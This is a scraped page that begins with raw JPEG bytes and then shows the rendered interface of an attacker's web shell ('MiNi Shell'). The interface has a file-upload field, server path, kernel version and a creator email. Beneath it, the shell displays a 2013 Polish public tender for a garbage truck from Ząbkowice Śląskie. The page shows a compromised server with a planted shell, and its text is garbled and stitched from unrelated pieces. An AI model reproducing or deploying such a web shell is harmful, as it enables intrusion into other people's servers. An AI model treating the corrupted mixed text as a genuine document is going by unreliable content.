JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131011/211371-N-2013.html

<p class="kh_header"><b>Ząbkowice Śl.: Zakup i dostawa pojazdu specjalistycznego do odbioru i transportu odpadów komunalnych</b><br>
<b>Numer ogłoszenia: 211371 - 2013; data zamieszczenia: 11.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Komunalnej Sp. z o.o. , ul. Daleka 2, 57-200 Ząbkowice Śl., woj. dolnośląskie, tel. 74 8 151 855, faks 74 8 100 328.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: sp. z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa pojazdu specjalistycznego do odbioru i transportu odpadów komunalnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa fabrycznie nowego samochodu śmieciarki do zbiórki odpadów komunalnych z terenów wiejskich Gminy Ząbkowice Śl. z dofinansowaniem ze środków unijnych w ramach działania Podstawowe usługi dla gospodarki ludności wiejskiej objętego PROW na lata 2007-2013.
Wykonawca w ofercie musi zaproponować sprzęt, który będzie posiadał wszystkie elementy wymienione w przedmiocie zamówienia. 
III.1. Zabudowa śmieciarki 
1.	zabudowa fabrycznie nowa - rocznik 2013; 
2.	skrzynia ładunkowa o przekroju prostokątnym, ożebrowana profilem zamkniętym, ściany boczne profilowane, podłoga płaska; 
3.	pojemność skrzyni ładunkowej: 20 - 23 m3; 
4.	skrzynia ładunkowa posiadająca drzwi kontrolne na bocznej ścianie; 
5.	objętość kosza zasypowego: min. 1,5 m3; 
6.	dno wanny zasypowej wykonane z jednego kawałka blachy trudnościeralnej o grubości min. 8 mm, pozostałe elementy odwłoka wykonane z blachy o podwyższonej odporności na ścieranie o grubości od 4 mm do 8 mm; 
7.	mechanizm zgniatania liniowo - płytowy, czyli tzw. szufladowy 
8.	stopień zagęszczania odpadów minimum 1:5; 
9.	zabudowa skrzyniowa z urządzeniem zasypowym tylnym;
10.	uniwersalne urządzenie załadowcze dostosowane do współpracy z pojemniki od 60 do 1100 litrów; 
11.	dwuetapowy proces podnoszenia pojemnika: 
12.	prostopadłe unoszenie pojemnika, 
13.	obrót; 
14.	przełącznik do ustawienia dwóch prędkości podnoszenia zasypu: dla pojemników o pojemności do 240 l i powyżej; 
15.	maksymalne czasy opróżniania pojemników: 
- 110 litrów - 8s, 
- 1100 litrów - 11s; 
16.	część tylna (odwłok) posiadająca automatyczne blokowanie i odblokowywanie; 
17.	siłowniki prasy zgniatającej bez wewnętrznych czujników zbliżeniowych i krańcowych, umieszczone na zewnątrz odwłoka; 
18.	układ uwalniania zakleszczonych przedmiotów; 
19.	króciec odpływowy w wannie załadowczej z kurkiem spustowym; 
20.	kamera wraz z mikrofonem umieszczona z tyłu zabudowy oraz monitor i głośnik zainstalowane w kabinie kierowcy
21.	dwa wyłączniki bezpieczeństwa 
22.	sterownik do automatycznego cyklu załadunku oraz cyklu pojedynczego 
23.	sterowanie ręczne 
24.	sterowanie urządzeniem zasypowym umieszczone po obu stronach odwłoka; 
25.	sterowanie płytą wypychającą wysuwanie i wsuwanie odbywa się ze stanowiska na zewnątrz z boku skrzyni ładunkowej lub z pulpitu sterowniczego znajdującego się przy siedzeniu w kabinie kierowcy; 
26.	możliwość odczytu w urządzeniu rejestrującym liczby cykli pracy: prasy zagęszczającej, podnoszenia i opuszczania odwłoka oraz czasu pracy pompy hydraulicznej, przez osoby nadzorujące pracę obsługi; 
27.	możliwość wykonania auto diagnozy sprawności układu elektrycznego przez urządzenie znajdujące się w kabinie kierowcy; 
28.	włączanie pompy hydraulicznej zabudowy poprzez sprzęgło elektromagnetyczne; 
29.	instalacja hydrauliczna powinna być zasilana przez pompę dwustrumieniową o wydajności min. 120 l/min; 
30.	krawędź zasypu położona na wysokości 1400 mm; 
31.	zabudowa wielokrotnie gruntowana i lakierowana w kolorze pomarańczowym; 
32.	oświetlenie według obowiązujących obecnie przepisów: światła hamowania, postojowe, kierunkowskazy oraz dwa światła alarmowe kogut z przodu i z tyłu pojazdu; 
33.	reflektor roboczy w odwłoku; 
34.	pasy odblaskowe (ostrzegawcze) na kabinie i odwłoku; 
35.	błotniki kół tylnych z chlapaczami; 
36.	boczne ściany skrzyni ładunkowej pokryte na całej swojej powierzchni blachą aluminiową; 
37.	dwa stopnie dla ładowaczy wraz z czujnikami (jazda do przodu przy obciążonym stopniu max 30 km/h, jazda do tyłu niemożliwa) - automatyczna informacja w kabinie kierowcy o tym, który stopień jest zajęty; 
38.	sygnał dźwiękowy o cofaniu się pojazdu do tyłu; 
39.	zabudowa musi posiadać znak CE. 
40.	urządzenie załadowcze przykręcane do odwłoka, w pełni demontowalne;
41.	urządzenie załadowcze w całości ocynkowane ;
42.	załadunek pojemników bez konieczności zwiększania obrotów silnika (na biegu jałowym podwozia)

III.2 Podwozie 
Podwozie fabrycznie nowe - rocznik 2013. 
Silnik 
1.	typ silnika - 6 cylindrowy silnik wysokoprężny; 
2.	pojemność silnika - od 9 do 10 litrów; 
3.	moc silnika - minimum 225 kW; 
4.	norma czystości spalin - Euro V; 
5.	poziom hałasu - zgodnie z normą UE do 80 dB; 
6.	ogranicznik prędkości - do 85 km/h. 

 
b) Skrzynia biegów 
1.	skrzynia biegów - minimum 9 biegowa, manualna; 
2.	skrzynia biegów z nadbiegiem; 

c) Przystawka odbioru mocy 
1.	przystawka odbioru mocy ze skrzyni biegów; 
2.	sterowanie fabryczne przystawki odbioru mocy. 

d) Układ hamulcowy 
1.	hamulec wydechowy; 
2.	układ zapobiegający blokowaniu się kół podczas hamowania;
3.	wentylowane hamulce tarczowe na osi przedniej i tylnej; 
4.	dwucylindrowa sprężarka powietrza z ogrzewanym osuszaczem i trybem ekonomicznym. 
e) Zawieszenie 
1.	zawieszenie przednie - piórowe wyposażone w amortyzatory i stabilizator; 
2.	zawieszenie tylne - pneumatyczne, wyposażone w amortyzatory i stabilizator; 
3.	przednia oś o max nośności min. 7,5 tony; 
4.	tylna oś z 4 miechami pneumatycznymi o max nośności min. 11,5 tony; 
5.	druga oś tylna (wleczona) z 2 miechami pneumatycznymi o max nośności min. 7 ton; 
6.	rozstaw osi (między I a II) - od 3800 mm; 
7.	mechaniczna blokada mechanizmu różnicowego. 
f) Konstrukcja i wygląd zewnętrzny kabiny 
1.	szkielet kabiny z blachy cynkowanej galwanicznie i zabezpieczonej antykorozyjnie metodą kataforezy; 
2.	blokada drzwi lewych i prawych - elektryczna za pomocą pilota, przełącznik blokady na desce rozdzielczej; 
3.	przeźroczysta, zewnętrzna osłona przeciwsłoneczna na przednią szybę; 
4.	elektryczna regulacja lusterek głównych i szerokokątnych; 
5.	lusterka główne i szerokokątne ogrzewane elektrycznie; 
6.	elektrycznie sterowane szyby boczne; 
7.	wywietrznik dachowy; 
8.	belka ostrzegawczo - sygnalizacyjna umieszczona na dachu kabiny; 
9.	osłony lusterek: czarne; 
10.	kolor podwozia: szary; 
11.	kolor kabiny: biały. 
g) Wnętrze kabiny 
1.	kabina 3 osobowa; 
2.	lewostronny układ kierowniczy; 
3.	komfortowy fotel kierowcy z zawieszeniem pneumatycznym oraz pneumatycznym podparciem lędźwiowym; 
4.	zintegrowany zagłówek i trzypunktowy pas bezpieczeństwa; 
5.	trzeci fotel typu stałego między fotelami kierowcy i zmiennika; 
6.	pasy bezpieczeństwa; 
7.	klimatyzacja; 
8.	filtr przeciwpyłkowy; 
9.	radio CD: tuner FM/AM, odtwarzacz CD, min. 2 głośniki; 
10.	tachograf cyfrowy; 
11.	podziałka prędkościomierza km/h; 
12.	antena zespolona - AM/FM i GPS, zakresy GSM 900 MHz, 1800 MHz i GPRS; 
13.	tempomat; 
14.	wyświetlacz LCD, pokazujący ostrzeżenia i informacje w języku polskim, posiadający licznik pracy PTO, zużycie paliwa średnie i chwilowe; 
15.	sterowanie funkcjami komputera pokładowego umieszczone na desce rozdzielczej. 
h) Wyposażenie elektryczne 
1.	akumulatory minimum 140 Ah; 
2.	napięcie 24 V z 2 akumulatorów; 
3.	wyłącznik główny zewnętrzny; 
4.	alternator min. 80 A; 
5.	reflektory z żarówkami halogenowymi; 
i) Zbiornik paliwa 
1.	stalowy zbiornik paliwa; 
2.	pojemność zbiornika min. 300 l; 
3.	korek zamykany na kluczyk; 
4.	zbiornik AdBlue min. 45 l. 
j) Podwozie 
1.	brzęczyk biegu wstecznego z możliwością jego odłączenia; 
2.	rura wydechowa skierowana do góry umieszczona po prawe stronie kabiny; 
3.	podwozie wyposażone w moduł elektroniczny dla producentów nadwozi; 
4.	złącze aplikacyjne dla funkcji śmieciarki oraz funkcje CAN w złączu użytkowym. 
III.3 Wymagania dotyczące gwarancji i serwisu pogwarancyjnego 
a) Zamawiający wymaga, aby Wykonawca udzielił Zamawiającemu na przedmiot zamówienia gwarancji jakości: 
1.	minimum 24 miesiące na zabudowę, 
2.	minimum 24 miesiące na podwozie. 
b) w ramach złożonej oferty, Wykonawca zapewni Zamawiającemu przyjazd autoryzowanego serwisu do siedziby Zamawiającego w ciągu maksymalnie 24 godzin lub zapewni miejsce w punkcie serwisu stacjonarnego. W przypadku awarii zabudowy dłuższej niż 48 godzin od zgłoszenia się serwisu, Wykonawca na swój koszt udostępni Zamawiającemu pojazd zastępczy o parametrach zabudowy podobnych do pojazdu będącego w naprawie. 
III.4 Pozostałe wymagania Zamawiającego 
a) Wykonawca zapewni dostawę części zamiennych na podstawie odrębnych zamówień; 
b) Wykonawca w ramach zamówienia zobligowany jest do dostarczenia Zamawiającemu: 
1.	instrukcji obsługi w języku polskim, zawierającej co najmniej katalog części zamiennych wraz ze schematami układu hydraulicznego i elektrycznego, ilość i rodzaj stosowanych olejów i płynów eksploatacyjnych w poszczególnych układach; 
2.	książki serwisowej i gwarancyjnej w języku polskim; 
3.	dokumentacji dopuszczającej samochód do ruchu drogowego (dokumenty umożliwiające rejestrację pojazdu, świadectwo homologacji) 
c) Wykonawca przeszkoli co najmniej 3 osoby w zakresie obsługi i eksploatacji samochodu. 
Dostawa samochodu - śmieciarki do siedziby Zamawiającego na koszt Wykonawcy. 

Wykonawca zobowiązuje się zdobyć informacje konieczne do właściwego wykonania zamówienia.
Zamawiający dopuszcza rozwiązania równoważne opisanym w przedmiocie zamówienia. Za rozwiązania równoważne opisanym zg. z art. 30 ust 1 -3 uznaje się zastosowanie innych materiałów, urządzeń, sposobów wykonania przedmiotu zamówienia o parametrach technicznych i jakościowych odpowiadających lub przewyższających opisane w dokumentacji projektowej. Ilekroć w niniejszej specyfikacji wraz z załącznikami przedmiot zamówienia jest opisany ze wskazaniem znaków towarowych, patentów lub pochodzenia, to przyjmuje się, że każdemu takiemu wskazaniu towarzyszą wyrazy lub równoważny. Za rozwiązania równoważne uznane zostaną rozwiązania o parametrach nie niższych niż podane w dokumentacji projektowej. W przypadku składania oferty, w której wykonawca proponuje rozwiązania równoważne, do oferty należy dołączyć w formie tabeli wykaz proponowanych materiałów, urządzeń itp. równoważnych, a w przypadku rozwiązań równoważnych do opisanych zgodnie z art. 30 ust 1-3 także dokumenty stwierdzające w sposób jednoznaczny ich równoważność. Brak wskazania w ofercie propozycji zastosowania rozwiązań równoważnych oznaczać będzie, że przedmiot zamówienia zostanie wykonany przy zastosowaniu urządzeń, materiałów i sposobów wykonania przyjętych w dokumentacji technicznej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.14.45.11-3, 34.14.45.10-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W formie oryginału oświadczenie o treści wynikającej z zapisów art. 22 ustawy Pzp- wzór oświadczenia stanowi załącznik do SIWZ.
Oceny spełnienia warunków udziału w postępowaniu Zamawiający dokona na podstawie analizy załączonych przez Wykonawcę do oferty oświadczeń i dokumentów, wyszczególnionych w SIWZ. Z treści załączonych oświadczeń i dokumentów musi jednoznacznie wynikać, iż Wykonawca spełnił warunki udziału w postępowaniu, o których mowa w części V SIWZ w ust. 1 i 2.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonywanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. 

Wykonawca musi wykazać się wiedzą i doświadczeniem, w wykonaniu  lub wykonywaniu min. 
1 dostawy pojazdu specjalistycznego do odbioru i transportu odpadów komunalnych wraz z załączeniem dowodów czy zostały wykonane lub są wykonywane należycie- wg załącznika nr 7.
Oceny spełnienia warunków udziału w postępowaniu Zamawiający dokona na podstawie analizy załączonych przez Wykonawcę do oferty oświadczeń i dokumentów, wyszczególnionych w SIWZ. Z treści załączonych oświadczeń i dokumentów musi jednoznacznie wynikać, iż Wykonawca spełnił warunki udziału w postępowaniu, o których mowa w części V SIWZ w ust. 1 i 2.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w formie oryginału oświadczenie o treści wynikającej z zapisów art. 22 ustawy Pzp- wzór oświadczenia stanowi załącznik do SIWZ.
Oceny spełnienia warunków udziału w postępowaniu Zamawiający dokona na podstawie analizy załączonych przez Wykonawcę do oferty oświadczeń i dokumentów, wyszczególnionych w SIWZ. Z treści załączonych oświadczeń i dokumentów musi jednoznacznie wynikać, iż Wykonawca spełnił warunki udziału w postępowaniu, o których mowa w części V SIWZ w ust. 1 i 2.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w formie oryginału oświadczenie o treści wynikającej z zapisów art. 22 ustawy Pzp- wzór oświadczenia stanowi załącznik do SIWZ.
Oceny spełnienia warunków udziału w postępowaniu Zamawiający dokona na podstawie analizy załączonych przez Wykonawcę do oferty oświadczeń i dokumentów, wyszczególnionych w SIWZ. Z treści załączonych oświadczeń i dokumentów musi jednoznacznie wynikać, iż Wykonawca spełnił warunki udziału w postępowaniu, o których mowa w części V SIWZ w ust. 1 i 2.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w formie oryginału oświadczenie o treści wynikającej z zapisów art. 22 ustawy Pzp- wzór oświadczenia stanowi załącznik do SIWZ.
Oceny spełnienia warunków udziału w postępowaniu Zamawiający dokona na podstawie analizy załączonych przez Wykonawcę do oferty oświadczeń i dokumentów, wyszczególnionych w SIWZ. Z treści załączonych oświadczeń i dokumentów musi jednoznacznie wynikać, iż Wykonawca spełnił warunki udziału w postępowaniu, o których mowa w części V SIWZ w ust. 1 i 2.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniona specyfikacja techniczna.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgk-zabkowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.zgk-zabkowice.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2013 godzina 10:00, miejsce: ZGK Sp. zo.o. ul. Daleka 2; 57-200 Ząbkowice Śląskie  , (Sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dofinansowanie ze środków unijnych w ramach działania Podstawowe usługi dla gospodarki ludności wiejskiej objętego PROW na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com